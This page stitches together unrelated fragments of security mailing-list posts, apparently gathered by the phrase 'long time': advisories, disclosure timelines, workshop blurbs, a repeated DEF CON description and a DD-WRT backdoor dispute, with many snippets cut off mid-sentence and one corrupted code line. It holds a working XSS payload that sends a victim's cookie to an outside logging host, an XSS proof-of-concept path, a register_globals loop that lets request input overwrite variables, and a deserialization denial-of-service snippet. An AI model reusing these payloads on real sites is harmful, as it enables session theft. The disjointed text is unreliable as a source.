Next Page >>
long time
> bitmage discovered that in every fresh release and every custom
> firewall two other rules are added in front of all.
> the rules will allow every service on the dd-wrt router from the ip
> 194.231.229.20 and from the ip 212.65.2.116
>
this is removed since a long time and these both ip did not exist. i
explained also in the forum how this problem occured
> some workarounds exist, I didnt test any of them, because dd-wrt isnt
> trustworth anymore for me. I can confirm this flaw in the latest
> stable vpn release.
>
DESCRIPTION:
So you're bored, and have never gone to a convention? You want to meet all
the other members of the so called 'computer underground'? You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks. You've bullshitted with the best, and
now it's time to meet them in Vegas! For me I've been networking for years,
and now I'll get a chance to meet everyone in the flesh. Get together with
a group of your friends and make the journey.
Checkmarx Research Labs has identified a new critical vulnerability in
Internet Explorer (other browsers are probably exposed the same way) that
would allow hackers to easily compromise web applications. Cross-Site
History Manipulation (XSHM) is a newly discovered zero-day attack: attackers
may have been using it for a long time, but the application and security
communities do not know it.
To help major browsers or application developers stop the proliferation of
this exploit, Checkmarx has published a guide to identify and remediate the
vulnerability. It can be downloaded at
> Both variables ($app_path and $puntal_path) are defined in the index.php
> file. As such they will never be overridden when the variables are passed
> via POST or GET. POST and GET variables are populated and placed into the
> global scope before the page is processed by the PHP processor engine
> (assuming register globals is enabled, which it hasn't been in a default PHP
> install in a long time).
>
> Line 29 of index.php: $app_path = '/';
> Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;
>
> Additionally the following line (Line 43 of Index.php) calls a function
in September 2008, Day of bugs in browsers in September 2008 and Day of
bugs in browsers 2: reloaded in October 2008. And now the time has come for
new project.
I conducted the project Day of bugs in WordPress
(http://websecurity.com.ua/1685/) at 30.12.2007 and already long time ago
planned to conduct new project, but only now found the time. In that project
I disclosed 81 vulnerabilities - these are Arbitrary file edit
(http://websecurity.com.ua/1686/), Local File Include, Directory Traversal
and Full path disclosure (http://websecurity.com.ua/1687/) vulnerabilities.
Among them there are 49 Full path disclosure, 1 Arbitrary file edit and 31
Software Defined Radio (SDR) techniques are rapidly becoming essential to all areas of wireless security research. Recent attacks on Bluetooth, GSM, wired and wireless keyboards, implantable medical devices, RFID, and more have been made possible by software radio. A combination of lectures, software exercises, and over-the-air projects, this workshop will provide the hands-on background in digital signal processing and radio engineering required to apply software radio techniques to practical hacking of diverse wireless systems. If you have experience developing software but lack experience with radio technology and digital signal processing, this workshop is for you.
Application Security Workshop
Instructor: Jared DeMott
Includes: CD with VMWare images and printed training materials
There are four technical skills required by security researchers, software quality assurance engineers, or developers concerned about security: Source code auditing, fuzzing, reverse engineering, and exploitation. All these skills and more are covered. C/C++ code has been plagued by security errors resulting from memory corruption for a long time. Problematic code is discussed and searched for in lectures and labs, with WebGoat introduced as well. Fuzzing is a topic book author DeMott knows about well. Mutation file fuzzing and framework definition construction (Sulley and Peach) are just some of the lecture and lab topics. When it comes to reversing C/C++ (Java and others are briefly discussed) IDA pro is the tool of choice. Deep usage of this tool is covered in lecture and lab. Exploitation discussions and labs are the exciting final component. You’ll enjoy exploiting BSD local programs to Vista browsers using the latest techniques.
Web and Cloud Application Security Workshop
Instructor: Andre Gironda
Includes: Printed workbook, Build/setup/use of a virtual infrastructure
This cloud-web application security workshop covers web applications in various virtual infrastructures, primarily focused on defense, compliance, and incident response. First, we'll identify applications as if they had already been attacked. Then, we'll come up with a risk management plan based on incident data, compliance/regulations, as well as data classifications. We'll look at full-knowledge verification using web server configuration and content files, in addition to runtime and source code verification. We'll go over the various implications of pen-testing cloud-web applications. This will include a thorough look at the strengths and weaknesses of web application firewalls and application hardening practices. Finally, we'll perform mock verifications and discuss partnering with application developers.
Both variables ($app_path and $puntal_path) are defined in the index.php
file. As such they will never be overridden when the variables are passed
via POST or GET. POST and GET variables are populated and placed into the
global scope before the page is processed by the PHP processor engine
(assuming register globals is enabled, which it hasn't been in a default PHP
install in a long time).
Line 29 of index.php: $app_path = '/';
Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;
Additionally the following line (Line 43 of Index.php) calls a function
anymore. it seems that chris implemented this for a customer. i
removed it now" (they are still in the default install image)
"nvram unset ral
nvram commit "
"there is no security hole. both ip's are not active anymore and
obsolete since a long time. "
"i will lock this thread now. a new release is scheduled soon (within
this or next week), but you cannot force me to release buggy code
based on the current internal tree.thats my last statement on this
topic" (Posted: Tue Aug 19, 2008 10:57 pm)
DESCRIPTION:
So you're bored, and have never gone to a convention? You want to meet
all the other members of the so called 'computer underground'? You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks. You've bullshitted with the best,
and now it's time to meet them in Vegas! For me I've been networking for
years, and now I'll get a chance to meet everyone in the flesh. Get
together with a group of your friends and make the journey.
Hello ,
I haven't send any new bugs for long time :)
Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net
* i think their website doesn't work at the moment
exploit :
open http://www.example.com/xpbook/entry.php
*
* Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.
* Attackers can exploit this issue to obtain sensitive information including tray password,
* web username, password and hostnames that may lead to further attacks.
*
* Note: Vendor has been notified long time ago confirming a design error.
* Vendor site: http://www.no-ip.com
*
*/
using System;
2008/02/25 n.runs notifies Jscape that an advisory will be released by
the
end of the week if they do not patch the flaw n.runs reported
roughly 2 years ago.
"Given the long time this has already been reported
(12/2006),
and the criticality of this issue, I would expect a patch to
be
ready by the end of the week. If the patch is not available
until
------------------
C] easy IP banning
------------------
this is a problem affecting Soldat from long time, in fact the bug is
just in the lack of a real check on the players which join the server,
in short it's enough one single UDP packet for being inside it.
While in the past the banning happened with malformed packets (I wrote
a PoC for it), in the recent versions is possible to exploit this
problem sending multiple join packets causing a banning of 20 minutes
> released a patch for it (which was serious approach, but not Microsoft for
> IE, nor other vendors use such approach for DoS holes in browsers).
>
> But take into account that I informed (at 26.05.2010) all four browser
> vendors about many vulnerabilities, which I'll disclose in the future. So
> they are informed for long time in advance :-). And so you have no need to
> worry, because with every day they become more and more "informed long
> time
> ago" and have more and more days to fix these holes.
>
> Best wishes & regards,
}
System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = ois.readObject(); // returns after a very very long time
}
}
Credit:
DESCRIPTION:
So you're bored, and have never gone to a convention? You want to meet
all the other members of the so called 'computer underground'? You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks. You've bullshitted with the best,
and now it's time to meet them in Vegas! For me I've been networking for
years, and now I'll get a chance to meet everyone in the flesh. Get
together with a group of your friends and make the journey.
2008/02/20 Jscape promises to "continue to look into this issue and
notify you when a patch is available".
2008/02/25 n.runs notifies Jscape that an advisory will be released
by the end of the week if they do not patch the flaw
n.runs reported roughly 2 years ago.
"Given the long time this has already been reported
(12/2006), and the criticality of this issue, I would
expect a patch to be ready by the end of the week. If the
patch is not available until the end of this week
(29.02.2008) I'll proceed with the advisory"
2008/02/29 Jscape notifies n.runs that the flaw has been patched
and rav formula, we have released them separately here:
http://www.isecom.org/ravs/
There's more details there at the site about Attack Surface metrics.
This is the core of the stuff we've been talking about for a long time
as a game-changer to the current guessing problem of the risk models.
This works where risk fails.
Enjoy!
More real-world example where an attacker will silently transfer your Google.com cookie to his or her evil site:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index
I would like thank the Google Security Team for their prompt responses and fixing this serious issue in a timely manner. If you think Google took a long time in fixing this vulnerability, think again. This python script is used in a lot of places. Try this Google Dork to see the usage of this script in almost all Google Services.
The application allows the use of Custom Fields, searching
of these custom fields is possible on the search page.
The value used for searching the custom field is not
properly cleaned before being used in the SQL query.
Please note this vulnerability is in the code lot for a long time
if using BugTracker.NET publicly you could be vulnerable.
IV. SAMPLE CODE
_______________
Hello ml,
I would like to point out that this vulnerability (Microsoft Internet
Explorer FTP Command Injection Vulnerability)
has been published long time ago, here is the advisory:
http://www.securityfocus.com/archive/1/383722
Cheers,
One year after the release of Debian GNU/Linux 5.0 alias 'lenny' and
nearly three years after the release of Debian GNU/Linux 4.0 alias
'etch' the security support for the old distribution (4.0 alias
'etch') is coming to an end next month. The Debian project is proud
to be able to support its old distribution for such a long time and
even for one year after a new version has been released.
The Debian project has released Debian GNU/Linux 5.0 alias 'lenny' on
the 14th of February 2009. Users and Distributors have been given a
one-year timeframe to upgrade their old installations to the current
exploits"), and became a methodology in 2009 ("The Departed: Exploit Next
Generation - The Philosophy").
. ENG++ became a methodology when I decided to port it to work
with/to any open exploit development framework, i.e., Metasploit Framework.
. Ported means that ENG++ has been developed for a long, long, long
time, so just some modules is working on Metasploit Framework to release
some of its example and to help people understanding that really cool stuff
can be done when you are innovating and creating.
In a few words: Exploit Next GenerationR Compliance Methodology is not the
same thing as Advanced Evasion Techniques (ENG++ != AET).
tones) will be played upon incoming messages, making the attack more
silent and less noticeable by an user.
Battery removal may be needed, in some cases, for restoring normal
functionalities.
Manual deletion of all received SMS requires a very long time, making
the deletion of all the SMS the most viable option, but leading to loss
of all received SMS and requiring in any case a large amount of time
(even hours).
The faster option for restoring the device is performing a hard reset of
the device, leading to the loss of all the content saved on the handset.
if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
# fix register globals, for now, should be phased out gradually
# sure, this gets around the entire reason that
regLANGUAGE_SWITCHister globals
# should be off, but going through three years of code takes a long time....
foreach ($_REQUEST as $key => $val) {
$$key = $val;
}
}
> anymore. it seems that chris implemented this for a customer. i
> removed it now" (they are still in the default install image)
> "nvram unset ral
> nvram commit "
> "there is no security hole. both ip's are not active anymore and
> obsolete since a long time. "
> "i will lock this thread now. a new release is scheduled soon (within
> this or next week), but you cannot force me to release buggy code
> based on the current internal tree.thats my last statement on this
> topic" (Posted: Tue Aug 19, 2008 10:57 pm)
>
However, having a web browser based session, and a phone browser based
session, doesn't seem to matter to facebook and I can have both open at
the same time. There seems to be some potential to exploit there.
-Manny
(long time subscriber, but haven't posted since the late 90s)
On 1/16/2010 4:39 AM, Michael Scheidell wrote:
> AP Report says it was a 'routing problem'? any idea what they are
> talking about, do THEY know what they are talking about?
> Did AT&T mix up the destination ip addresses? did facebook NOT CHECK IP
Nov 2009 "BiG TiME"
"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
| | an attacker may exhaust stack memory in the SIP stack |
| | network thread by presenting excessively long numeric |
| | strings in various fields. |
| | |
| | Note that while this potential vulnerability has existed |
| | in Asterisk for a very long time, it is only potentially |
| | exploitable in 1.6.1 and above, since those versions are |
| | the first that have allowed SIP packets to exceed 1500 |
| | bytes total, which does not permit strings that are |
| | large enough to crash Asterisk. (The number strings |
| | presented to us by the security researcher were |
> The mere mention of fcgi-bin/echo in your first mail is enough for anybody
> to derive the PoC. Here's what I found in under a minute:
> */fcgi-bin/echo/<script>aler('xss')</script>*
Sorry, that is a different issue: the one you mention was patched by
Oracle a long time ago. (All the fcgi-bin/echo that I tested, were
already patched against the one you mention, but vulnerable to that
other I found.)
Cheers, Paul
Next Page>>
|
